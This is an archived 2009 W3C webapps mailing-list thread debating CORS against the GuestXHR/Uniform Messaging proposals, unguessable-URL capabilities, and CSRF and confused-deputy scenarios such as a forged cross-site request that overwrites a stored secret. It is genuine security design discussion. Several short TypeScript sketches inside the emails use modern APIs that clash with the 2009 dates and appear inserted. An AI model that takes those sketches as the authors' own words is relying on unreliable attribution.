 mechanism. For example, a per-user static feed updated daily on some
 server by some automated process. The server is accessible on the public
 Web. The administrator of this service has agreements with numerous
 trusted sites, let's say a dozen sites, which are allowed to fetch this
 file using XHR (assuming the user is already logged in). The sites that
 fetch this file do not require authentication (e.g. one could be my portal
 page, which is just a static HTML page, without any server-side script).
 Other sites must not be allowed access to the file.

 How does one configure the server to handle this case?

Again going with the simplest thing that could possibly work:

Each of the per-user static feeds is referenced by a unique
unguessable URL of the same format used in the previous example. For
example,

https://example.com/user123/?s=42tjiyrvnbpoal
https://example.com/user456/?s=sdfher34nvl34
...

Again, a GET response from such a URL carries the same-origin opt-out header.

The user gives this URL only to those services he wants to access the
feed. For example, you could copy this URL into your personal static
HTML page that acts as your portal.
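
A minimal sketch of how the daily feed job might mint and remember one stable
unguessable URL per user; the table and the URL shape are assumptions.

import { randomBytes } from "node:crypto";

const feedUrls = new Map<string, string>();  // user id -> stable unguessable URL

function feedUrlFor(userId: string): string {
  let url = feedUrls.get(userId);
  if (!url) {
    url = `https://example.com/${userId}/?s=${randomBytes(16).toString("hex")}`;
    feedUrls.set(userId, url);
  }
  return url;  // given only to the services the user chooses, e.g. the portal page
}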

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Semi-public resources in Uniform Messaging

2009-12-08 Thread Tyler Close
Hi Ian,

To answer your question, I need a better understanding of what
semi-public means. At first blush, it sounds a little bit like
semi-pregnant. More inline below...

On Tue, Dec 8, 2009 at 6:16 AM, Ian Hickson i...@hixie.ch wrote:

 I'm trying to understand this proposal and how it would interact with
 Server-sent Events, XBL2, canvas/img, and video:

We're not proposing changing the existing security model of the img
tag, since that would break existing sites. A new img-like tag that
supports UMP might be a good thing to have though.


   
 http://lists.w3.org/Archives/Public/public-webapps/2009OctDec/att-0914/draft.html

 How would one label a static resource on an intranet server, e.g.

   http://videos.corp.example.com/tgif/2009-12-11.ogg

 ...such that it can be used by the pages on the following hosts:

   http://www.corp.example.com/
   http://moma.corp.example.com/
   http://tgif.corp.example.com/
   http://intranet.example.com/

 ...but such that it could _not_ be used by pages on the following hosts:

   http://hostile-blog.example.com/

What exactly do you mean by used? Do you mean that the blog site
author cannot obtain the bytes in the OGG file?

For now, my best guess at your meaning is that you want some way to
prohibit deep-linking to publicly accessible resources. Is that what
you mean? If so, then I gather you're using a static OGG file as part
of a bandwidth stealing argument. Am I following? If so, then I'm
not sure how the intranet part plays into the scenario.

I think we need to clarify the exact scenario and the access control
rules being enforced before proceeding. For example, who can read and
write what, what do they want to do, and who must not be able to read
or write what.

Thanks,
--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Semi-public resources in Uniform Messaging

2009-12-08 Thread Tyler Close
Hi Ian,

I assume you want to move on to the XHR-like example, so I've just got
a few clarification questions about it...

On Tue, Dec 8, 2009 at 11:18 AM, Ian Hickson i...@hixie.ch wrote:
 http://lists.w3.org/Archives/Public/public-webapps/2009OctDec/att-0914/draft.html

 To recast the question in terms of XMLHttpRequest, how would one label a
 static resource on an intranet server, e.g.:

   http://marketing.corp.example.com/productcodes.xml

 ...such that it can be read (using XMLHttpRequest) by scripts embedded on
 pages from the following hosts:

   http://www.corp.example.com/
   http://finance.corp.example.com/
   http://eng.corp.example.com/
   http://intranet.example.com/

 ...but such that it could _not_ be read by pages from the following hosts
 (i.e. the HTTP response would not be made accessible to scripts on pages
 from these hosts):

   http://hostile-blog.example.com/
   http://www.hostile.example/

Are you saying a firewall prevents the author of the attack pages from
directing his own browser to any of the legitimate pages that have
access to the data? So, all the resources with access to the secret
data are hosted by servers behind a firewall; and all the attackers
are outside the firewall? Furthermore, all the resources with access
to the secret data are trusted to not send the secret data to the
attacker? It also seems that any resource hosted behind the firewall
also has access to the secret data, since it can just send a request
server-to-server, instead of server-to-browser-to-server. True?

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Patent disclosure for UniMess? [Was: [cors] Uniform Messaging, a CSRF resistant profile of CORS]

2009-12-07 Thread Tyler Close
Hi Art,

For the Status of this Document section, I just copied the text
recommended at:

http://www.w3.org/2005/03/28-editor-style.html

I did not mean to obfuscate any patent disclosure issues. I personally
do not know of any relevant patents.

--Tyler

On Sun, Dec 6, 2009 at 5:27 AM, Arthur Barstow art.bars...@nokia.com wrote:
 Mark, Tyler,

 *IF* this proposal was a WG document, its Status of the Document section
 would include a patent disclosure requirement like the one in CORS:

 [[
 http://www.w3.org/TR/2009/WD-widgets-access-20090804/

 An individual who has actual knowledge of a patent which the individual
 believes contains Essential Claim(s) must disclose the information in
 accordance with section 6 of the W3C Patent Policy.
 ]]

 Would you two (and anyone else that contributed to the UniMess proposal)
 please make a patent disclosure for your proposal?

 -Art Barstow


 On Nov 23, 2009, at 12:33 PM, ext Tyler Close wrote:

 I made some minor edits and formatting improvements to the document
 sent out on Friday. The new version is attached. If you read the prior
 version, there's no need to review the new one. If you're just getting
 started, use the attached copy.

 Thanks,
 --Tyler

 On Fri, Nov 20, 2009 at 5:04 PM, Tyler Close tyler.cl...@gmail.com
 wrote:

 MarkM and I have produced a draft specification for the GuestXHR
 functionality we've been advocating. The W3C style specification
 document is attached. We look forward to any feedback on it.

 We agree with others that GuestXHR was not a good name and so have
 named the proposal Uniform Messaging for reasons elaborated in the
 specification.

 To parallel the CORS separation of policy from API, this first
 document is the policy specification with an XMLHttpRequest-like API
 yet to follow.

 Abstract:
 
 This document defines a mechanism to enable requests that are
 independent of the client's context. Using this mechanism, a client
 can engage in cross-site messaging without the danger of
 Cross-Site-Request-Forgery and similar attacks that abuse the cookies
 and other HTTP headers that form a client's context. For example, code
 from customer.example.org can use this mechanism to send requests to
 resources determined by service.example.com without further need to
 protect the client's context.
 

 Thanks,
 --Tyler




 --
 Waterken News: Capability security on the Web
 http://waterken.sourceforge.net/recent.html

 draft.html





-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CSRF vulnerability in Tyler's GuestXHR protocol?

2009-11-16 Thread Tyler Close
On Fri, Nov 13, 2009 at 6:45 PM, Devdatta dev.akh...@gmail.com wrote:

 Some parts of the protocol are not clear to me. Can you please clarify
 the following :
 1 In msg 1, what script context is the browser running in ? Site A or
 Site B ? (in other words who initiates the whole protocol ?)

 Server A, or a bookmark.

 Wasn't Maciej's original scenario that of a user going to Site B (an
 event's site) and adding stuff to his calendar at A ? In such a
 scenario, the complete protocol should ideally start with B.

There are two parts to Maciej's scenario: the access grant (get
permission to use the calendar) and the use of access (add an event to
the calendar). Maciej starts the first at Server A (the calendar site)
and the second at Server B (the upcoming events site). Our proposed
solution does the same as Maciej's proposal.

See:

http://sites.google.com/site/guestxhr/maciej-challenge

If you want to try working on a different scenario that starts both
steps at Server B, that's fine. With the same techniques applied in
Maciej's scenario, you should be able to construct a solution to the
new scenario.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [cors] unaddressed security concerns

2009-11-16 Thread Tyler Close
On Thu, Nov 5, 2009 at 9:59 PM, Maciej Stachowiak m...@apple.com wrote:

 Hi Tyler,

 On Nov 5, 2009, at 5:48 PM, Tyler Close wrote:

 Closing remark:

 In another thread, you've written I do think that a way to do an
 anonymous XHR is justified, so I don't know how much sense it makes
 to continue this thread. You put so much effort into this email that I
 felt I owed you a response.

 Let me make sure I understand your position and overall goal in this
 discussion. Is it:

 A) An API to do anonymous XHR (such as GuestXHR) should be provided *AND*
 CORS should be abandoned (and perhaps removed from implementations shipping
 it).

 OR:

 B) An API to do anonymous XHR (such as GuestXHR) should be added, but you
 can live with CORS continuing to exist.


 I thought your position was (A). If it is in fact (B), then perhaps we have
 all invested more energy than necessary in this debate, because I don't
 think (B) is especially controversial. But if your position is (A), then the
 statement you quoted wasn't meant to agree with that position (in case it
 wasn't clear).

MarkM and I have been arguing for position (A), and will continue to
do so, but getting an agreement on (B) is valuable. When I saw your
agreement to (B), I wanted to make sure that didn't get lost in the
noise around the debate of (A). To further assist this, MarkM and I
are currently working on a fully formed specification for GuestXHR.
I'm tempted to push on that and pause the debate on (A) until we have
WG consensus on this new spec. With the good tool in place, arguing to
drop the bad one carries less risk.

 That being said, I feel the input from you and Mark and the ensuing
 discussion has helped the Working Group get a better understanding of the
 security issues in this area, and I believe it will help us make a
 high-quality Security Considerations section. So if you have further replies
 in mind that would help inform the conversation, then please feel encouraged
 to send them.

I'm glad you've found this discussion worthwhile and thank you for
saying so. I think the slide set you put together was also a great
help to the discussion. We do have further analysis we'd like to
contribute on (A) and DBAD, but for at least the short term, I'd like
to focus on getting GuestXHR in place. Expect a first draft of that
this week...

Thanks,
--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CSRF vulnerability in Tyler's GuestXHR protocol?

2009-11-13 Thread Tyler Close
Hi Devdatta,

On Thu, Nov 12, 2009 at 12:27 AM, Devdatta dev.akh...@gmail.com wrote:
 Hi Tyler,

 Some parts of the protocol are not clear to me. Can you please clarify
 the following :
 1 In msg 1, what script context is the browser running in ? Site A or
 Site B ? (in other words who initiates the whole protocol ?)

Server A, or a bookmark.

 2 Msg 3 is a form POST or a XHR POST ? If the latter , 5 needs to be
 marked as a GuestXHR

Msg 3 is a form POST, so that the response can redirect the browser to Server B.

 3 The 'secret123' token : Does it expire? If yes when/how ? Also, if
 it expires, will the user have to again confirm the grant from A ?

As presented, the token does not expire. If you want it to expire, the
simplest implementation would be to simply redo the introduction step.
Another alternative is to have Server B ask Server A for a fresh
secret by sending a request containing the previous secret. After the
initial introduction, Server B has Server A's URL and a shared secret
for authorization, so you can use that to bootstrap communication
between the two servers.
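
A sketch of that refresh alternative on Server A's side; the storage shape is
an assumption, not part of the protocol.

import { randomBytes } from "node:crypto";

const activeSecrets = new Map<string, string>();  // secret -> account it authorizes

function refreshSecret(oldSecret: string): string | null {
  const account = activeSecrets.get(oldSecret);
  if (account === undefined) return null;         // unknown or expired secret
  activeSecrets.delete(oldSecret);                // the old secret stops working at once
  const fresh = randomBytes(16).toString("hex");
  activeSecrets.set(fresh, account);
  return fresh;                                   // returned to Server B over HTTPS
}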

 Thanks
 Devdatta

My pleasure,
--Tyler


 2009/11/10 Tyler Close tyler.cl...@gmail.com:
 I've elaborated on the example at:

 http://sites.google.com/site/guestxhr/maciej-challenge

 I've tried to include all the information from our email exchange.
 Please let me know what parts of the description remain ambiguous.

 Just so that we're on the same page, the prior description was only
 meant to give the reader enough information to see that the scenario
 is possible to implement under Maciej's stated constraints. I expected
 the reader to fill in their favored technique where that choice could
 be done safely in many ways. Many of the particulars of the design
 (cookies vs URL arguments, 303 vs automated form post, UI for noting
 conflicts) can be done in several different ways and the choice isn't
 very relevant to the current discussion. All that said, I'm happy to
 fill out the scenario with as much detail as you'd like, if that helps
 us reach an understanding.

 --Tyler

 On Thu, Nov 5, 2009 at 8:31 PM, Adam Barth w...@adambarth.com wrote:
 You seem to be saying that your description of the protocol is not
 complete and that you've left out several security-critical steps,
 such as

 1) The user interface for confirming transactions.
 2) The information the server uses to figure out which users it is talking 
 to.

 Can you please provide a complete description of your protocol with
 all the steps required?  I don't see how we can evaluate the security
 of your protocol without such a description.

 Thanks,
 Adam


 On Thu, Nov 5, 2009 at 12:05 PM, Tyler Close tyler.cl...@gmail.com wrote:
 Hi Adam,

 Responses inline below...

 On Thu, Nov 5, 2009 at 8:56 AM, Adam Barth w...@adambarth.com wrote:
 Hi Tyler,

 I've been trying to understand the GuestXHR protocol you propose for
 replacing CORS:

 http://sites.google.com/site/guestxhr/maciej-challenge

 I don't understand the message in step 5.  It seems like it might have
 a CSRF vulnerability.  More specifically, what does the server do when
 it receives a GET request for https://B/got?A=secret123?

 Think of the resource at /got as like an Inbox for accepting an add
 event permission from anyone. The meta-variable A in the query
 string, along with the secret, is the URL to send events to. So a
 concrete request might look like:

 GET /got?site=https%3A%2F%2Fcalendar.example.com&s=secret123
 Host: upcoming.example.net

 When upcoming.example.net receives this request, it might:

 1) If no association for the site exists, add it
 2) If an existing association for the site exists respond with a page
 notifying the user of the collision and asking if it should overwrite
 or ignore.

 Notice that step 6 is a response from Site B back to the user's browser.

 Alternatively, the response in step 6 could always be a confirmation
 page asking the user to confirm any state change that is about to be
 made. So, the page from the upcoming event site might say:

 I just received a request to add a calendar to your profile. Did you
 initiate this request? yes no

 Note that such a page would also be a good place to ask the user for a
 petname for the new capability, if you're into such things, but I
 digress...

 The slides say Associate user,A with secret123.  That sounds like
 server B changes state to associate secret123 with the pair (user,
 A).  What stops an attacker from forging a cross-site request of the
 form https://B/got?A=evil123?

 In the design as presented, nothing prevents this. I considered the
 mitigation presented above sufficient for Maciej's challenge. If
 desired, we could tighten things up, without resorting to an Origin
 header, but I'd have to add some more stuff to the explanation.

  Won't that overwrite the association?

 That seems like a bad idea.

 There doesn't seem to be anything in the protocol that binds the A
 in that message to server

Re: CORS Background slides

2009-11-10 Thread Tyler Close
I've updated the web page that describes the calendar access grant. See:

http://sites.google.com/site/guestxhr/maciej-challenge

More comments inline below...

On Wed, Nov 4, 2009 at 6:14 PM, Maciej Stachowiak m...@apple.com wrote:

 On Nov 4, 2009, at 6:04 PM, Maciej Stachowiak wrote:


 I forgot to mention another shared secret management risk with the
 proposed GuestXHR-based protocol. The protocol involves passing the shared
 secret in URLs, including URLs that will appear in the browser's URL field.
 URLs should not be considered confidential - they have a high tendency to
 get inadvertently exposed to third parties. Some of the ways this happens
 include caching layers, the browser history (particularly shared sync of the
 browser history), and users copying URLs out of the URL field without
 considering whether this particular URL contains a secret.

 I believe this can be fixed by always transmitting the shared secret in
 the body of an https POST rather than as part of the URL, so this risk is
 not intrinsic to this style of protocol.

 On second thought - I don't see an obvious way to change the access grant to
 avoid sending the shared secret in the URL of a GET request. You can't just
 change the 303 redirect to a 307, since the original post body did not
 contain the shared secret; and there is no way to redirect in a way that
 changes the POST body. Maybe someone else can think of a way to do it.

Personally, I think including a secret in a URL is a fine technique,
but if you want to avoid it, you could instead return a 200 response
in step 4 and have JavaScript in the page do an automated form
submission with the secret in the body of the POST request.
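
A browser-side sketch of that automated form submission, so the secret travels
in the body of an https POST rather than in a URL; the field names are
assumptions.

function autoPostSecret(target: string, site: string, secret: string): void {
  const form = document.createElement("form");
  form.method = "POST";
  form.action = target;                       // e.g. https://B/got
  for (const [name, value] of [["site", site], ["s", secret]]) {
    const field = document.createElement("input");
    field.type = "hidden";
    field.name = name;
    field.value = value;
    form.appendChild(field);
  }
  document.body.appendChild(form);
  form.submit();                              // navigates to Site B with the secret in the body
}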

For those interested, I've argued in favor of secret token in the URL at:

http://waterken.sf.net/web-key

 Another issue: how does Server B defend against a CSRF vulnerability in
 receiving the shared secret from Server A? It seems like a page from any
 server could send it an invalid shared secret at any time, thus breaking
 Server B's ability to access Server A.

.. assuming Server B is willing to silently overwrite its current
state with the new invalid secret. That would be a poor choice. For
clarity, I've expanded the description of what Server B could do to
avoid such attack scenarios.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CSRF vulnerability in Tyler's GuestXHR protocol?

2009-11-10 Thread Tyler Close
I've elaborated on the example at:

http://sites.google.com/site/guestxhr/maciej-challenge

I've tried to include all the information from our email exchange.
Please let me know what parts of the description remain ambiguous.

Just so that we're on the same page, the prior description was only
meant to give the reader enough information to see that the scenario
is possible to implement under Maciej's stated constraints. I expected
the reader to fill in their favored technique where that choice could
be done safely in many ways. Many of the particulars of the design
(cookies vs URL arguments, 303 vs automated form post, UI for noting
conflicts) can be done in several different ways and the choice isn't
very relevant to the current discussion. All that said, I'm happy to
fill out the scenario with as much detail as you'd like, if that helps
us reach an understanding.

--Tyler

On Thu, Nov 5, 2009 at 8:31 PM, Adam Barth w...@adambarth.com wrote:
 You seem to be saying that your description of the protocol is not
 complete and that you've left out several security-critical steps,
 such as

 1) The user interface for confirming transactions.
 2) The information the server uses to figure out which users it is talking to.

 Can you please provide a complete description of your protocol with
 all the steps required?  I don't see how we can evaluate the security
 of your protocol without such a description.

 Thanks,
 Adam


 On Thu, Nov 5, 2009 at 12:05 PM, Tyler Close tyler.cl...@gmail.com wrote:
 Hi Adam,

 Responses inline below...

 On Thu, Nov 5, 2009 at 8:56 AM, Adam Barth w...@adambarth.com wrote:
 Hi Tyler,

 I've been trying to understand the GuestXHR protocol you propose for
 replacing CORS:

 http://sites.google.com/site/guestxhr/maciej-challenge

 I don't understand the message in step 5.  It seems like it might have
 a CSRF vulnerability.  More specifically, what does the server do when
 it receives a GET request for https://B/got?A=secret123?

 Think of the resource at /got as like an Inbox for accepting an add
 event permission from anyone. The meta-variable A in the query
 string, along with the secret, is the URL to send events to. So a
 concrete request might look like:

 GET /got?site=https%3A%2F%2Fcalendar.example.com&s=secret123
 Host: upcoming.example.net

 When upcoming.example.net receives this request, it might:

 1) If no association for the site exists, add it
 2) If an existing association for the site exists respond with a page
 notifying the user of the collision and asking if it should overwrite
 or ignore.

 Notice that step 6 is a response from Site B back to the user's browser.

 Alternatively, the response in step 6 could always be a confirmation
 page asking the user to confirm any state change that is about to be
 made. So, the page from the upcoming event site might say:

 I just received a request to add a calendar to your profile. Did you
 initiate this request? yes no

 Note that such a page would also be a good place to ask the user for a
 petname for the new capability, if you're into such things, but I
 digress...

 The slides say Associate user,A with secret123.  That sounds like
 server B changes state to associate secret123 with the pair (user,
 A).  What stops an attacker from forging a cross-site request of the
 form https://B/got?A=evil123?

 In the design as presented, nothing prevents this. I considered the
 mitigation presented above sufficient for Maciej's challenge. If
 desired, we could tighten things up, without resorting to an Origin
 header, but I'd have to add some more stuff to the explanation.

  Won't that overwrite the association?

 That seems like a bad idea.

 There doesn't seem to be anything in the protocol that binds the A
 in that message to server A.

 The A is just the URL for server A.

 More generally, how does B know the message https://B/got?A=secret123
 has anything to do with user?  There doesn't seem to be anything in
 the message identifying the user.  (Of course, we could use cookies to
 do that, but we're assuming the cookie header isn't present.)

 This request is just a normal page navigation, so cookies and such
 ride along with the request. In the diagrams, all requests are normal
 navigation requests unless prefixed with GXHR:.

 We used these normal navigation requests in order to keep the user
 interface and network communication diagram as similar to Maciej's
 solution as possible. If I were approaching this problem without that
 constraint, I might do things differently, but that wasn't the goal of
 this exercise.

 Can you help me understand how the protocol works?

 My pleasure. Please send along any follow up questions.

 (I would have chosen a different Subject field for these questions though)

 P.S., It also seems that the protocol does not comply with the HTTP
 specification because the server changes state in response to a GET
 request.  Presumably, you mean to use a 307 redirect and a POST
 request

Re: CORS Background slides

2009-11-09 Thread Tyler Close
On Wed, Nov 4, 2009 at 5:57 PM, Maciej Stachowiak m...@apple.com wrote:
 5) I would summarize the tradeoff between this mechanism for a simple
 cross-site communication scenario vs. the CORS way to do it as follows:

    a) In the CORS-based protocol, if you change the scenario in a way that
 violates the DBAD discipline, you may introduce a CSRF-like vulnerability.
 In other words, making a programming error that violates DBAD can introduce
 a vulnerability into the system.

    b) In the GuestXHR-based protocol, if you make a programming error in
 generating or maintaining the confidentiality of the shared secret, you may
 introduce a CSRF-like vulnerability.

Just to clarify the terminology, if the shared secret leaked, the
resulting attack would not be CSRF-like, but rather would be a direct
use of a stolen secret key. The situation is analogous to an attacker
somehow reading the victim site's cookies in solution a), and then
making direct use of them. In a CSRF-like attack, the attacker never
obtains direct knowledge of a secret key, but instead causes a deputy
to issue requests on behalf of the attacker.

 6) Combining the shared secret mechanism with the Origin/Cookie mechanism
 increases overall security of the solution. Then you have to make *both* an
 error in violating DBAD and in management of the shared secret to create a
 vulnerability. Making only one of these mistakes will not introduce a
 CSRF-like vulnerability. Thus, running the proposed protocol over XHR2+CORS
 provides defense in depth relative to the GuestXHR-based solution.


 Combining 5 and 6, the risk of programming errors with CORS-only solutions
 has to be weighed against the risk of programming errors in shared-secret
 solutions plus the loss of the ability to create defense in depth by
 combining Origin/Cookie checks with a shared secret.

I'm still unclear on how you intend to provide defense in depth by
using Origin. You are right that there's more that can be done to
reduce the risk of programming with shared-secrets though. A lot can
be done without any browser support. For example, see the security
model for my web_send JavaScript library:

http://waterken.sourceforge.net/web_send/#securityModel

In this library, shared secrets are held in URLs, which are in turn
only exposed to JavaScript code as opaque objects. Since the
JavaScript code never gets direct access to the shared secrets, it is
unable to accidentally, or even maliciously, leak the secrets. There's
no need to study this library for the purposes of this discussion. It
just provides an example of how programming with shared secrets can be
made pleasant and safe.
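
Not the web_send API itself, just a sketch of the underlying idea: hold the
secret-bearing URL inside a closure so page code can use it without being able
to read or leak it.

type OpaqueTarget = { fetchJSON: () => Promise<unknown> };

function makeOpaqueTarget(secretUrl: string): OpaqueTarget {
  // secretUrl never escapes this closure; callers only get a function to invoke
  return {
    fetchJSON: async () => {
      const res = await fetch(secretUrl, { credentials: "omit" });  // uniform request
      return res.json();
    },
  };
}

// Usage: page code is handed an OpaqueTarget, never the URL string itself.
// const feed = makeOpaqueTarget("https://a.example/feed/?s=secret123");
// feed.fetchJSON().then(data => console.log(data));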

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: CSRF vulnerability in Tyler's GuestXHR protocol?

2009-11-05 Thread Tyler Close
Hi Adam,

Responses inline below...

On Thu, Nov 5, 2009 at 8:56 AM, Adam Barth w...@adambarth.com wrote:
 Hi Tyler,

 I've been trying to understand the GuestXHR protocol you propose for
 replacing CORS:

 http://sites.google.com/site/guestxhr/maciej-challenge

 I don't understand the message in step 5.  It seems like it might have
 a CSRF vulnerability.  More specifically, what does the server do when
 it receives a GET request for https://B/got?A=secret123?

Think of the resource at /got as like an Inbox for accepting an add
event permission from anyone. The meta-variable A in the query
string, along with the secret, is the URL to send events to. So a
concrete request might look like:

GET /got?site=https%3A%2F%2Fcalendar.example.com&s=secret123
Host: upcoming.example.net

When upcoming.example.net receives this request, it might:

1) If no association for the site exists, add it
2) If an existing association for the site exists respond with a page
notifying the user of the collision and asking if it should overwrite
or ignore.

Notice that step 6 is a response from Site B back to the user's browser.

Alternatively, the response in step 6 could always be a confirmation
page asking the user to confirm any state change that is about to be
made. So, the page from the upcoming event site might say:

I just received a request to add a calendar to your profile. Did you
initiate this request? yes no

Note that such a page would also be a good place to ask the user for a
petname for the new capability, if you're into such things, but I
digress...
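
A sketch of what the /got resource could do with those two cases; the storage
shape and the page text are assumptions, not a specification.

type Grant = { site: string; secret: string };
const grantsByUser = new Map<string, Grant>();  // logged-in user -> calendar grant

// Returns the page to render in step 6.
function handleGot(userId: string, site: string, secret: string): string {
  const existing = grantsByUser.get(userId);
  if (existing && existing.site === site) {
    // Collision: ask the user instead of silently overwriting.
    return `A calendar for ${site} is already linked. Overwrite or ignore?`;
  }
  grantsByUser.set(userId, { site, secret });
  return "I just received a request to add a calendar to your profile. " +
         "Did you initiate this request?";
}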

 The slides say Associate user,A with secret123.  That sounds like
 server B changes state to associate secret123 with the pair (user,
 A).  What stops an attacker from forging a cross-site request of the
 form https://B/got?A=evil123?

In the design as presented, nothing prevents this. I considered the
mitigation presented above sufficient for Maciej's challenge. If
desired, we could tighten things up, without resorting to an Origin
header, but I'd have to add some more stuff to the explanation.

  Won't that overwrite the association?

That seems like a bad idea.

 There doesn't seem to be anything in the protocol that binds the A
 in that message to server A.

The A is just the URL for server A.

 More generally, how does B know the message https://B/got?A=secret123
 has anything to do with user?  There doesn't seem to be anything in
 the message identifying the user.  (Of course, we could use cookies to
 do that, but we're assuming the cookie header isn't present.)

This request is just a normal page navigation, so cookies and such
ride along with the request. In the diagrams, all requests are normal
navigation requests unless prefixed with GXHR:.

We used these normal navigation requests in order to keep the user
interface and network communication diagram as similar to Maciej's
solution as possible. If I were approaching this problem without that
constraint, I might do things differently, but that wasn't the goal of
this exercise.

 Can you help me understand how the protocol works?

My pleasure. Please send along any follow up questions.

(I would have chosen a different Subject field for these questions though)

 P.S., It also seems that the protocol does not comply with the HTTP
 specification because the server changes state in response to a GET
 request.  Presumably, you mean to use a 307 redirect and a POST
 request.  Unfortunately, that means the protocol will generate a
 warning dialog in Firefox and will fail completely in Safari 4.

I just said 303 because it was the most succinct way of expressing the
relevant part of the communication. In deployment, a better solution
would be to send back a normal 200 response with JavaScript code that
does an automated form POST of the same data to Server B.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [cors] unaddressed security concerns

2009-11-05 Thread Tyler Close
Hi Maciej,

Responses inline below...

On Wed, Nov 4, 2009 at 9:36 PM, Maciej Stachowiak m...@apple.com wrote:

 On Nov 3, 2009, at 5:33 PM, Tyler Close wrote:
 On Mon, Oct 12, 2009 at 7:19 AM, Maciej Stachowiak m...@apple.com wrote:

 As a side note, I should add that Tyler's scenario would be much simpler
 overall if printer.example.net used a grant of read access to the photo
 it
 wants to print on storage.example.org, instead of granting write access
 to a
 new location.

 In this scenario, photo.example.com has the opportunity to take the
 role of attacker in a CSRF-like attack. In the legitimate case,
 photo.example.com is expected to send a URL to printer.example.net
 which identifies the photo to be printed, such as
 http://storage.example.org/photo123. In the attack case,
 photo.example.com could send the URL that identifies the
 printer.example.net client list, such as
 http://storage.example.org/clients123. Consequently,
 photo.example.com receives a print out of the printer.example.net
 client list, instead of a photo printout.

 What's the attack here? Is it information disclosure or vandalism?

The problem is information disclosure. My understanding of your
proposed design was that photo.example.com would grant read access
over a file to printer.example.net and send the file's URL to
printer.example.net. The printer.example.net would then use its own
credentials to read the file content, print it out and mail it to the
recipient. In the legitimate case, photo.example.com grants read
access to a photo file that it owns. In the attack case,
photo.example.com sends a URL for the printer.example.net client list.
The printer.example.net site already has permission to read its own
file, so it prints it out and mails it to the attacker.

Perhaps this design is not what you originally intended, but it was my
understanding from the original email:

http://www.w3.org/mid/5d7511b2-da9d-40af-a536-d799fb6ee...@apple.com

As a side note, I should add that Tyler's scenario would be much
simpler overall if printer.example.net used a grant of read access to
the photo it wants to print on storage.example.org, instead of
granting write access to a new location. Or it can just ask
photo.example.com to read the photo from storage.example.org and send
the actual data. Either of these much less abusable than writing, and
would be a safer approach, whether or not the overall design depends
on secret tokens. The grant of read access can be one-time or time-
limited if necessary. Thus, I think the scenario is somewhat
contrived. Likely cross-site interactions would not involve such a
complex process to transfer data. The root of the vulnerability in
Tyler's scenario is writing in a shared namespace to transfer data,
instead of simply granting read access to the existing copy, or
transferring the actual data bits.


Either way, this was an older email and I am happy to move on to
discuss your most current thinking on this topic.

 That being said, my understanding of this threat was greatly improved by the
 discussion at TPAC. I now think the best way to address multi-site
 collaboration is by applying the DBAD discipline. Here's how I would do it
 in this case:

 The storage service is designed to allow collaborative access by multiple
 sites, therefore it needs to let them distinguish their own requests from
 third-party requests. One way to do so is to partition resources such that
 each is owned by exactly one storage domain. The only way to share
 information cross-domain is to copy. Resource names include the domain that
 owns them. Then it offers the following command set (angle brackets are used
 to delimit metasyntactic variables):

 (This may be more complicated than needed, for the sake of clarity):

 Read <from>
   If the <from> resource is owned by the domain specified by Origin, return
 the data.

 Write <to>\n
 <filedata>
   If the <to> resource is owned by the domain specified by Origin, store
 <filedata> at the resource.

 SameDomainCopy <from> <to>
   <from> and <to> must be in the same domain and must match Origin.

 GetReadToken <resource>
   If the Origin header matches <resource>, return a one-time read token
 which can be used to copy a resource cross-domain.

 GetWriteToken <resource>
   If the Origin header matches <resource>, return a one-time write token
 which can be used to copy a resource cross-domain.

 CrossDomainCopy <from-domain> <from-resource> <read-token> <to-domain>
 <to-resource> <write-token>
    <read-token> must be a valid read token for <from-resource>, and
 <from-resource> must be owned by <from-domain>. <write-token> must be a
 valid write token for <to-resource>, and <to-resource> must be owned by
 <to-domain>. Origin must match at least one of <from-domain> or <to-domain>.

 This allows two sites to agree to copy a resource from one to the other on
 storage.example.org without introducing a confused deputy hazard.

 In the original scenario, photo.example.com would get a resource name and a
 write token from printer.example.net

Re: XHR and sandboxed iframes (was: Re: XHR without user credentials)

2009-06-26 Thread Tyler Close
On Thu, Jun 18, 2009 at 12:32 AM, Ian Hickson i...@hixie.ch wrote:
 On Wed, 17 Jun 2009, Mark S. Miller wrote:
 
  I don't really understand what we're trying to prevent here.

 Confused deputies such as XSRF problems. Original paper is at 
 http://www.cis.upenn.edu/~KeyKOS/ConfusedDeputy.html. It's well worth
 rereading. Much deeper than it at first appears.

 Could you describe a concrete attack that you are concerned about? I don't
 really see how the article you cite applies here.


 Perhaps my own srl.cs.jhu.edu/pubs/SRL2003-02.pdf may help.

 The threads and links already cited should make the connection with
 browser security clear.

 Maybe I'm just too stupid for this job, but I don't understand the
 connection at a concrete level. I mean, I think understand the kind of
 threats we're talking about, but as far as I can tell, CORS takes care of
 them all.

The problem with redirects that is still outstanding against CORS is a
concrete example of the general Confused Deputy issues with CORS. A
redirect is just one way for a site to pass an identifier to code from
another site. Confused Deputy vulnerabilities will occur in CORS
whenever an identifier (such as a URI) is passed from one site to
another. For example...

 I'm not really sure what more to explain. Perhaps you could ask a more
 specific question?

 Could you show some sample code maybe that shows the specific threat you
 are concerned about?

Consider two web-applications: photo.example.com, a photo manager; and
printer.example.net, a photo printer. Both of these web-apps use
storage provided by storage.example.org. We're going to print a photo
stored at: https://storage.example.org/photo123

1. A page from photo.example.com makes request:

POST /newprintjob HTTP/1.0
Host: printer.example.net
Origin: photo.example.com

HTTP/1.0 201 Created
Content-Type: application/json

{ "@" : "https://storage.example.org/job123" }

2. To respond to the above request, the server side code at
printer.example.net set up a new printer spool file at
storage.example.org and gave photo.example.com write access to the
file.

3. The same page from photo.example.com then makes request:

POST /copydocument HTTP/1.0
Host: storage.example.org
Origin: photo.example.com
Content-Type: application/json

{
"from" : { "@" : "https://storage.example.org/photo123" },
"to" : { "@" : "https://storage.example.org/job123" }
}

HTTP/1.0 204 Ok

That's the expected scenario. Now, what happens if in step 1,
printer.example.net responds with URL
